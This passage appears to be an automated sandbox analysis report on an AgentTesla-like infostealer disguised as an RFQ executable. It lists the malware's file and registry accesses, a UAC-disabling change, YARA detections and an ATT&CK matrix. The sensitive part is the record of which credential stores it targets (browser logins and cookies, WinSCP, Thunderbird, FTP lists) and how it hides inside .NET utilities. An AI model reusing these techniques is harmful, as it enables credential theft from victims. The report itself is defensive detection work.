                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AddIn\v4.0_4.0.0.0__b77a5c561934e089\System.AddIn.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AddIn\v4.0_4.0.0.0__b77a5c561934e089\System.AddIn.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Disables UAC (registry)
                    Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                    Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.18.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.18.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.18.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 10.2.svchost.exe.2169004f2c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.21690133730.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2877570286.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.2877901296.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.2877901296.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8084, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 8676, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 10.2.svchost.exe.2169004f2c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.21690133730.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2877570286.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.2877901296.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8084, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 8676, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 10.2.svchost.exe.2169004f2c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.svchost.exe.21690133730.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2877570286.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.2877901296.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.2877901296.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8084, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 8676, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts121
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		21
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Shared Modules                    		1
                    DLL Side-Loading                    		411
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
